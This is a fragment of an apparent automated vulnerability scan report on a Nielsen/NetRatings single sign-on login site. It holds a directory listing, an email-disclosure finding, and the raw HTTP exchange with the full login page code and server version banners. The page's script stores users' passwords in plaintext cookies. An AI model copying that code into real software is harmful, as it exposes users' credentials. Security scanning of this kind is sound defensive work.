<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/login.gif"><tt>login.gif</tt></a></td>
<td align="right"><tt>1.1 kb</tt></td>
<td align="right"><tt>Tue, 09 Jun 2009 01:25:00 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/login_1.gif"><tt>login_1.gif</tt></a></td>
<td align="right"><tt>1.2 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/login_2.gif"><tt>login_2.gif</tt></a></td>
<td align="right"><tt>1.2 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/login_6.gif"><tt>login_6.gif</tt></a></td>
<td align="right"><tt>0.6 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/login_7.gif"><tt>login_7.gif</tt></a></td>
<td align="right"><tt>0.7 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/login_atp.gif"><tt>login_atp.gif</tt></a></td>
<td align="right"><tt>0.6 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/login_bottom.gif"><tt>login_bottom.gif</tt></a></td>
<td align="right"><tt>7.3 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/login_cookie.js"><tt>login_cookie.js</tt></a></td>
<td align="right"><tt>3.1 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/login_cookie_autofill.js"><tt>login_cookie_autofill.js</tt></a></td>
<td align="right"><tt>2.3 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/login_nvw.gif"><tt>login_nvw.gif</tt></a></td>
<td align="right"><tt>1.5 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/login_sit.gif"><tt>login_sit.gif</tt></a></td>
<td align="right"><tt>0.7 kb</tt></td>
<td align="right"><tt>Tue, 24 Jul 2007 22:09:46 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/login_top.gif"><tt>login_top.gif</tt></a></td>
<td align="right"><tt>7.2 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/login_wb0706.gif"><tt>login_wb0706.gif</tt></a></td>
<td align="right"><tt>0.9 kb</tt></td>
<td align="right"><tt>Wed, 19 Nov 2008 20:22:08 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/logo.gif"><tt>logo.gif</tt></a></td>
<td align="right"><tt>4.2 kb</tt></td>
<td align="right"><tt>Thu, 20 Nov 2008 17:47:14 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/m%281%29.gif"><tt>m(1).gif</tt></a></td>
<td align="right"><tt>0.1 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/m.gif"><tt>m.gif</tt></a></td>
<td align="right"><tt>0.1 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/main.css"><tt>main.css</tt></a></td>
<td align="right"><tt>53.2 kb</tt></td>
<td align="right"><tt>Fri, 21 Nov 2008 23:42:54 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/map.gif"><tt>map.gif</tt></a></td>
<td align="right"><tt>16.6 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/mobile.gif"><tt>mobile.gif</tt></a></td>
<td align="right"><tt>47.9 kb</tt></td>
<td align="right"><tt>Tue, 09 Jun 2009 19:51:00 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/nav.js"><tt>nav.js</tt></a></td>
<td align="right"><tt>0.9 kb</tt></td>
<td align="right"><tt>Tue, 24 Jul 2007 21:51:44 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/nav_bottom.jpg"><tt>nav_bottom.jpg</tt></a></td>
<td align="right"><tt>0.6 kb</tt></td>
<td align="right"><tt>Tue, 09 Jun 2009 01:25:00 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/nav_top.jpg"><tt>nav_top.jpg</tt></a></td>
<td align="right"><tt>0.3 kb</tt></td>
<td align="right"><tt>Tue, 09 Jun 2009 01:25:00 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/nielsen.gif"><tt>nielsen.gif</tt></a></td>
<td align="right"><tt>2.5 kb</tt></td>
<td align="right"><tt>Tue, 09 Jun 2009 01:25:00 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/nielsen_login.css"><tt>nielsen_login.css</tt></a></td>
<td align="right"><tt>6.3 kb</tt></td>
<td align="right"><tt>Thu, 17 Sep 2009 23:26:11 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/nn_click.js"><tt>nn_click.js</tt></a></td>
<td align="right"><tt>0.7 kb</tt></td>
<td align="right"><tt>Wed, 19 Aug 2009 05:20:43 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/nnselect.js"><tt>nnselect.js</tt></a></td>
<td align="right"><tt>5.1 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr>
&..
E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /josso/signon/

/josso/signon/

http://ssoprod.netratings.com/josso/signon/?product_id=6

Found E-mails

netratingsclientservices@nielsen.com

Request

GET /josso/signon/?product_id=6 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: ssoprod.netratings.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 14:20:27 GMT
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=3AA761F94AA76886B4516B6961127C9C.a01; Path=/
Content-Type: text/html;charset=iso-8859-1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><title>Nielsen Online Client Login : Login</title><link type="text/css" rel="stylesheet" href="../ref/nielsen_login.css"><script type="text/javascript" src="../ref/nav.js"></script><script type="text/javascript" src="../ref/topnav_MM.js"></script><script type="text/javascript" src="../ref/nav.js"></script><script type="text/javascript" src="../ref/login_cookie.js"></script><script type="text/javascript" src="../ref/enterSubmit.js"></script><script type="text/javascript" src="../ref/focusForm.js"></script><script type="text/javascript" src="../ref/topnav_MM.js"></script><script type="text/javascript" src="../ref/nn_click.js"></script><script type="text/javascript" src="../ref/form.js"></script><style type="text/css"><!--.style1 { color: #6ea3ba; font-weight: bold;}.mess {font-family:Arial, Helvetica, sans-serif; font-size:15px; font-weight:bold; color:#009dd9;line-height: 19px;padding: 0px 0px 0px 0px;margin:10px 13px 20px 24px;}--></style></head><body onload="if (window.pageOnLoad) window.pageOnLoad()"><table width="100%" cellpadding="0" cellspacing="0" border="0" height="100%"> <tr bgcolor="#ffffff" height="11%"> <td align="center" height="68"> <!--header--> <table width="966" cellpadding="0" cellspacing="0" border="0" height="68"> <tr> <td align="left"><a href="http://www.nielsen.com"><img src="../ref/nielsen.gif" width="140" height="68" border="0"></a></td> </tr> </table></td> </tr> <tr bgcolor="#b1c9d4" height="82%"> <td align="center" valign="top"> <!--page content--> <table width="966" cellpadding="0" cellspacing="0" border="0"> <tr height="10"> <td colspan="2"> </td> </tr> <tr> <td align="left" valign="top"> <!--bd left--> <div id="left"> <div class="CLI"> <img src="../ref/banner.gif" alt="Nielsen MObile Media Login"> <div class="decoTop">&nbsp;</div> <div class="title"><span class="subtitle"><img src="../ref/login.gif" alt="lock" border="0"></span>Online Division Client Login<br><img src="http://www.netratings.com/img/en/global/transparent.gif" width="25" height="8"><span class="subtitle2">NetRatings, BuzzMetrics, Mobile Media</span></div> <!-- change start for RT 65056 --><!-- <div class="mess"><u>Important Message:</u> The NetView service will be undergoing scheduled maintenance between 10 PM EDT October 2nd through 10 PM EDT October 5th. There may be a few brief interruptions lasting no more than a few minutes each, but the service is expected to remain mostly available throughout this period.</div>--><!-- change end for RT 65056 --> <div class="frame2"> <span class="text">Are you a client with questions? <a target="_new" href="mailto:netratingsclientservices@nielsen.com">Contact us</a> </span><br><img src="http://www.netratings.com/img/en/global/transparent.gif" width="8" height="5"> <div class="border"> <table width="606"> <tr> <td width="243"> <!--<div class="subtitle"></div>--> <p>&nbsp;</p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://ssoprod.netratings.com/josso/signon/?product_id=7">NetView</a></p> <!-- <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_jpbz.htm">NetView Japan and Brazil Banner Track</a></p> --> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_vc.htm">VideoCensus</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_ari.htm">AdRelevance</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<span class="style1">@Plan</span></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_hso.htm">Homescan Online</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_mvw.htm">MegaView</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_scs.htm">SiteCensus</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_ca.htm">Campaign Analysis</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_adi.htm">AdIntelligence</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_mki.htm">Market Intelligence</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_sur.htm">Survey Results</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.imseverywhere.com/Citrix/MetaFrame/auth/login.aspx">WebRF</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://my.buzzmetrics.com/">Nielsen BuzzMetrics</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://telecom.nielsen.com/mobilemedia/">Nielsen Mobile Media</a></p> <p>&nbsp;</p></td> <td width="55">&nbsp;</td> <td width="292" align="left" valign="top"> <p>&nbsp;</p> <!--<SPAN style='font-family:"Trebuchet MS", Arial, Helvetica, sans-serif;font-weight:bold;font-size:10pt' id='productTitle'>NetView</SPAN> --> <table width="292" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#ffffff"> <tr> <td valign="top" align="center"> <form name="usernamePasswordLoginForm" method="post" action="/josso/signon/usernamePasswordLogin.do;jsessionid=3AA761F94AA76886B4516B6961127C9C.a01"> <table border="0" cellspacing="0" cellpadding="0" width="292" > <tr> <td valign="top"> <form method="post" action="" id="login" name="login"> <table border="0" cellpadding="0" cellspacing="0" width="292px" align="left"> <!-- login form start --> <tr> <td align="left" valign="left"> <SPAN style='font-family:"Trebuchet MS", Arial, Helvetica, sans-serif;font-weight:bold;font-size:10pt' id='productTitle'>@Plan</SPAN> </td> </tr> <tr> <td height="16px" align="left" valign="left" style="color:red;"> <div id="error" class="errorDiv"> </div> </td> </tr> <tr> <td valign="left"> <table align="left" border="0" width="292" cellpadding="0" cellspacing="0"> <tr> <td align="left"> <input class="inputForm" size="27" maxlength="150" id="input_username" name="input_username" onFocus="if(this.value=='Username'){this.value=''};" onkeypress="return check_onkeypress(this,event)" type="text" value="Username"> <input type="hidden" name="josso_cmd" value="login"> <input type="hidden" name="josso_username" value=""> <input type="hidden" name="product_id" value="6"/> </td> </tr> <tr> <td align="left"> <input class="inputForm" size="27" maxlength="150" id="josso_password" name="josso_password" onFocus="if(this.value=='password'){this.value=''};" onkeypress="return check_onkeypress(this,event)" type=password value="password"/></td> </tr> <tr> <td>&nbsp;</td> </tr> <tr> <td align="left" valign="center"> <div> <input id="input_remember" type="checkbox">&nbsp; <span class="text">remember me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <input value="Submit" class="btnActive" type="button" onclick="javascript:doSubmit();" onMouseOver> </div> </td> </tr> </table></td> </tr> <!-- login form end --> </table> </form> </td> </table> <!--Gray border table end--> </td> </tr> </table> </form><script>var josso_product_id = '6';var josso_cookie_name = 'ntrt_josso_user';var josso_cookie_pass = 'ntrt_josso_pass';var josso_delimiter = ':';function check_onkeypress(element,e){ var whichCode = (window.Event) ? e.which : window.event.keyCode; if (whichCode == 13) doSubmit();} function doSubmit(){ var uname = document.getElementById('input_username').value.replace(' ', ''); if (!uname || !document.usernamePasswordLoginForm.josso_password.value) { document.getElementById("error").innerHTML = 'You need to enter your login and password.'; return false; } //alert("josso_product_id ===="+josso_product_id); //alert("UName ===="+uname); //alert("Pwd ===="+document.usernamePasswordLoginForm.josso_password.value); document.usernamePasswordLoginForm.josso_username.value = uname + josso_delimiter + josso_product_id; var hasRemember = document.getElementById('input_remember').checked; setCookie(josso_cookie_name, uname, hasRemember); setCookie(josso_cookie_pass, document.usernamePasswordLoginForm.josso_password.value, hasRemember); document.usernamePasswordLoginForm.submit();}function getCookie(name){ var nameEQ = name + "="; var ca = document.cookie.split(';'); for (var i=0; i < ca.length; i++) { var c = ca[i]; while (c.charAt(0)==' ') c = c.substring(1,c.length); if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length); } return null;}function setCookie(name, value, doSet){ var date = new Date(); date.setTime(date.getTime()+(1000*24*60*60*1000)); document.cookie = name + '=' + (doSet ? value : '') + '; path=/ ; expires=' + (doSet ? date.toGMTString() : 'Thu, 01-Jan-70 00:00:01 GMT') + ';';}function recallCookie(){ var uname = document.usernamePasswordLoginForm.josso_username.value; var usave = getCookie(josso_cookie_name); uname = (uname ? uname.split(josso_delimiter)[0] : usave); document.getElementById('input_remember').checked = (usave ? true : false);// document.getElementById('login_message').style.visibility = (josso_product_id == '6' ? 'visible' : 'hidden'); if (uname) { document.getElementById('input_username').value = uname; var pass = getCookie(josso_cookie_pass); if (pass) document.usernamePasswordLoginForm.josso_password.value = pass; document.usernamePasswordLoginForm.josso_password.focus(); } else { document.getElementById('input_username').focus(); }}function pageOnLoad(){ //document.getElementById('loginPageImg').style.visibility='visible'; recallCookie();}</script> <p>&nbsp;</p> <p>&nbsp;</p> <script language="javascript" src="../ref/login_cookie_autofill.js"></script> <a id="popup" href="#" style="z-index:1">Browers/Support Details <span id="popbox"> <div class="rem"> <u>Browsers Supported</u>:<br> IE 6.0+<br> FireFox 1.0+<br> <br> <u>Other Requirements</u>:<br> Windows XP, 2000, 98, NT4<br>Mac OS X <br> Screen Resolution: 1024x768<br> JavaScript 1.2+<br> Cookies enabled<br> Flash 3+ (recommended) </div> </span></a> </td> </tr> </table> </div> <div class="servSpec">This product and associated modules and services are protected by one or more of the following United States patents and their foreign counterparts: 5,675,510, 5,796,952, 6,108,637, 6,115,680, 6,138,155, 6,643,696 and 6,673,386. Other patents pending. </div> </div> <br> <div class="decoBottom">&nbsp;</div> </div> </div></td> <!--<div class="REL"> --> <td valign="top"> <!--bd right--> <div id="right"> <div class="REL" align="left"> <div class="title" align="left">&nbsp;&nbsp;Important Product News</div> <table border="0" cellpadding="0" cellspacing="4" class="item"> <!--<tr> <td colspan="2"> <div class="text"> <p>Request a Demo</p> </div> </td> </tr>--> <tr> <td ><div class="icon"&..